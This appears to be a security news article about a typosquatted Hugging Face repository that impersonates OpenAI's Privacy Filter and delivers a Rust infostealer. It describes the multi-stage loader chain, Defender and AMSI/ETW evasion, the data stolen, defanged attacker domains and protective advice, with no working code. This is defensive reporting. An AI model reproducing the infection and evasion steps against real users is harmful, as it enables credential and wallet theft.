Online Platform
Hacking

Hugging Face Malicious Model Impersonates OpenAI to Steal Data

Published  ·  10 min read
Updated on May 11, 2026

A malicious repository on Hugging Face ranked #1 on the platform by impersonating OpenAI's just-released Privacy Filter model while delivering a Rust-based information stealer to Windows users.

The Hugging Face malicious model was named Open-OSS/privacy-filter and copied the legitimate OpenAI openai/privacy-filter repository description verbatim in order to trick unsuspecting users into downloading it. Hugging Face has now disabled access to the malicious project.

OpenAI's Privacy Filter was announced in April 2026 as a way of detecting and redacting personally identifiable information (PII) from unstructured text; the legitimate model helps developers build applications with strong privacy and security protections. The Hugging Face malicious model was created for a very different purpose.

How the Impersonation Worked

The Hugging Face malicious model used a technique called typosquatting; attackers create a name that is very similar to a legitimate project, such as Open-OSS (instead of openai) and use the same name for the project (privacy-filter).

The attackers copied the entire description from OpenAI's legitimate model card nearly verbatim, so anyone skimming the repository would see the same text they expected from the official release, and the Hugging Face malicious model looked trustworthy at first glance.

The repository instructed users to clone it and run a batch script called start.bat for Windows or a Python script called loader.py for Linux or macOS systems, and these scripts were supposed to configure dependencies and start the model, but they did something much worse.

Multi-Stage Infection Chain

The Hugging Face bad actor utilized an elaborate multi-stage infection chain to deliver a payload.

Stage 1: Loader Script: The bad actor delivered the executable code to the victim via the loader.py Python script. The malicious code was executed on the loader, which disabled SSL certificate checks, decoded a Base64 encoded URL from a paste service called JSON Keeper, and pulled out an active command to run via PowerShell.

Using JSON Keeper as a dead-drop resolver was quite the clever idea, as it allowed the actors being analyzed to make changes to their payload URLs at any time without having to alter their repository, making them even harder to find.

Stage 2: PowerShell Downloader: The PowerShell command then downloaded a batch file from a different location located at api.eth-fastscan[.]org, and executed that batch file using cmd.exe.

Stage 3: UAC Bypass and Defender Exclusions: The Batch Script acts as a downloader preparing the environment for the next stage by UAC elevation (with the UAC prompt) and Microsoft Defender Antivirus' exclusions so that the malware was not detected, as well as downloading the next stage binary from the same domain, and creating a scheduled task for launching a PowerShell script that would execute the downloaded executable.

Stage 4: The use of an Information Stealer: The scheduled task that would execute the malware was originally loaded and then waited for two seconds before deleting itself to cover its tracks. This last stage was a Rust-based Information Stealer, which was used to steal-sensitive information (such as banking credentials) stored on the infected system.

What the Stealer Targeted

The Hugging Face malicious model infostealer was designed to extract a wide range of valuable data from infected Windows machines.
1. Screenshots were captured to potentially see what the user was doing.
2. A hacker may gain access to your Discord account by using a token that was previously harvested from you or your Discord account.
3. Victims' browser extensions and documents containing information that would allow a hacker to access victims' cryptocurrency wallets have been targeted by Hugging Face's "model stealer".
4. This malware harvested and stored all of the configuration settings of any FileZilla clients installed on victims' computers (.filezilla.xml), as these files hold the credentials for FTP access to many of the victims' websites.
5. Attackers extracted seed phrases from victims' cryptocurrency wallets, which gave them direct access to their cryptocurrency.
6. All browser data (saved passwords, cookies and history) from Google Chrome, Microsoft Edge, Brave, Firefox and other chromium-based or Gecko-based browsers were collected by the malware.
7. Metadata about the victim's system was aggregated to give the hacker an understanding of the system's environment.

Evasion Methods

The Hugging Face model stealer contained multiple methods to evade detection.

The malware monitored for the presence of a debugger or sandbox and changed its behavior on detection of a debugger or sandbox.  The malware also altered its behavior when running in a virtual machine environment.

The Hugging Face malicious model stealer tried to disable Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW), and these are two key security features that help Windows detect and block malicious scripts.
The malware also configured Microsoft Defender exclusions early in the infection chain, so the antivirus software would ignore the malicious files.

Despite using a scheduled task, the Hugging Face malicious model established no persistence, the scheduled task was destroyed before any reboot, and HiddenLayer explained that the task was being used as a one-shot SYSTEM-context launcher rather than a long-term backdoor.

Trending List Manipulation

Within 18 hours of being released on the Hugging Face platform, the Hugging Face malicious model achieved the number one spot in trending models (around 244K downloads, 667 likes) by way of what were surely manipulated stats through the use of some type of automation or bot to artificially inflate these statistics and to create an illusion of trust and popularity that could convince real users to download the Hugging Face malicious model as legitimate.

Anyone browsing the trending models saw this repository at the top, they saw hundreds of thousands of downloads and hundreds of likes, and they assumed it was safe because so many other people had already used it.

Six More Malicious Repositories

Further analysis of the Hugging Face malicious model campaign uncovered six more repositories using a similar Python loader to deploy the same infostealer.

These repositories were published under the user account anthfu and included names like:
anthfu/Bonsai-8B-gguf
anthfu/Qwen3.6-35B-A3B-APEX-GGUF
anthfu/DeepSeek-V4-Pro
anthfu/Qwopus-GLM-18B-Merged-GGUF
anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
anthfu/supergemma4-26b-uncensored-gguf-v2

All of these Hugging Face malicious model repositories used the same technique of impersonating popular or trending model names to attract downloads.

Connection to ValleyRAT and Silver Fox

The Hugging Face malicious model campaign shares infrastructure with a previous attack that delivered ValleyRAT (also known as Winos 4.0), a modular remote access trojan attributed to a Chinese hacking group called Silver Fox.

HiddenLayer observed that the domain api.eth-fastscan[.]org was also used to serve a different Windows executable (o0q2l47f.exe) that beacons out to welovechinatown[.]info, and this second domain was previously used in a campaign that leveraged a malicious npm package named trevlo to deliver ValleyRAT.

That npm campaign used a postinstall hook to silently execute an obfuscated JavaScript loader, which spawned a Base64-encoded PowerShell command, fetched and executed a second-stage PowerShell script, and finally downloaded and ran a Winos 4.0 stager binary.

HiddenLayer concluded that the shared infrastructure suggests these campaigns are possibly linked and likely part of a broader supply chain operation targeting open-source ecosystems, meaning the Hugging Face malicious model may be just one piece of a larger attack campaign.

The Silver Fox Connection

Silver Fox is a Chinese hacking group that has been active for several years, and the group is known for targeting organizations in Russia, India, and other Asia-Pacific countries with tax-themed phishing emails and sophisticated malware.

ValleyRAT (Winos 4.0) is the group's signature backdoor, and it has been used in countless attacks, and the Hugging Face malicious model campaign represents a new initial access vector for this same malware family.

Instead of sending phishing emails or poisoning search results, the attackers simply uploaded a malicious model to Hugging Face, manipulated the trending list, and waited for victims to come to them.

How to Protect Yourself

The Hugging Face malicious model has been disabled, but similar attacks will appear again.
1. Verify repository ownership. Before downloading any model from Hugging Face, check the author's username against the official organization, OpenAI's official models come from openai not Open-OSS, and this simple check would have revealed the Hugging Face malicious model as fake.

2. Do not run random scripts. The Hugging Face malicious model required users to manually run start.bat or loader.py, and no legitimate model should require you to execute batch scripts or Python loaders, the official Privacy Filter model does not ask this.

3. When checking download counts, be sure to look at them with skepticism. As demonstrated by the Hugging Face malacious model where there were inflated download and like counts and attackers can purchase or use bots for these metrics so please do not use popularity as a determining factor for if a model is safe or not.

4. Review code before executing. If a model asks you to run a script, open that script in a text editor first, the Hugging Face malicious model loader.py contained encoded PowerShell commands that were clearly suspicious.

5. Use security software. The Hugging Face malicious model infostealer attempted to disable AMSI and ETW, but modern endpoint detection tools can still catch these behaviors, keep your security software updated.

Final Thoughts

The Hugging Face malicious model campaign succeeded because it exploited trust in two ways, users trusted the Hugging Face platform itself, and they trusted the trending algorithm to surface safe, popular content.

The attackers manipulated both, they created a convincing impersonation of OpenAI's model, they copied the description verbatim, they inflated download and like counts, and they waited for victims to willingly infect themselves.

The Hugging Face malicious model reached #1 trending within 18 hours, and 244,000 downloads occurred before Hugging Face disabled it, and each of those downloads represents a potential compromise.

Hugging Face has removed this specific Hugging Face malicious model, but the anthfu account published six more repositories, and other attackers will copy this technique, always verify the source, never run random scripts, and remember that popularity on Hugging Face does not guarantee safety.

FAQ Section

What was the Hugging Face malicious model pretending to be?

The Hugging Face malicious model impersonated OpenAI's Privacy Filter model which was released in April 2026, the attackers used the name Open-OSS/privacy-filter instead of openai/privacy-filter, and they copied the entire description verbatim to trick users.

What is the total number of downloads of the malicious Hugging Face model? 

Around 244,000 people downloaded and liked the Hugging Face malicious model during its first 18 hours on the platform - it ended up trending #1 - but we think these numbers were manipulated by the hackers. 

What type of malware was delivered through the Hugging Face malicious model? 

The Hugging Face malicious model delivered a Rust-based information-stealer that collected Discord tokens, crypto wallets and wallet extensions, FileZilla configuration files, wallet seed phrases, browser data from both Chromium-based and Gecko-based browsers, screenshots, as well as system metadata.

Are the recent Hugging Face attacks linked with Silver Fox and/or ValleyRAT?  

Yes. The infrastructure identified in this malicious model campaign on Hugging Face (api.eth-fastscan[.]org & welovechinatown[.]info) was previously utilized for the delivery of ValleyRAT (Winos 4.0) – a backdoor exclusively attributed to the Chinese cyber crime syndicate, Silver Fox.

What can you do to prevent downloading fake models from Hugging Face?  

Ensure that the user name of the repository owner matches that of the well-known business (search the official page), don't execute all script source code files without first performing an audit, examine the repository name for signs of typographical errors (typosquatting), and don't assume that large amounts of downloads mean a model using has been created correctly. Attackers and criminals often try to manipulate download counts.

Source: The Hacker News
Keywords
Share LinkedIn
File Transfer Techniques in CTF Post-Exploitation: Linux & Windows Tools

File Transfer Techniques in CTF Post-Exploitation: Linux & Windows

Jun 25, 2026
Mistic Backdoor Deployed in Financially Motivated Attacks Hacking

Mistic Backdoor Deployed in Financially Motivated Attacks

Jun 25, 2026
Cisco SD-WAN Zero-Day Exploited for 2 Months Exploits

Cisco SD-WAN Zero-Day Exploited for 2 Months

Jun 25, 2026
Professional Services

Explore Our Cybersecurity Services

Our insights are backed by hands-on service delivery. If your business needs professional cybersecurity support, our UK-based specialists are ready to help.

Website Recovery Malware removal & incident response
Penetration Testing Authorised attack simulation
Vulnerability Assessment Identify & prioritise weaknesses
Secure Web Development OWASP-aligned, pen tested
Red Teaming Advanced adversary simulation

© 2016 – 2026 Red Secure Tech Ltd. Registered in England and Wales — Company No: 15581067

This website uses cookies to ensure you get the best experience on our website. We need your consent to show personalized or non-personalized ads, and to use cookies for analytics purposes. By clicking "Accept", you consent to the use of cookies and the collection of data as per our Privacy Policy.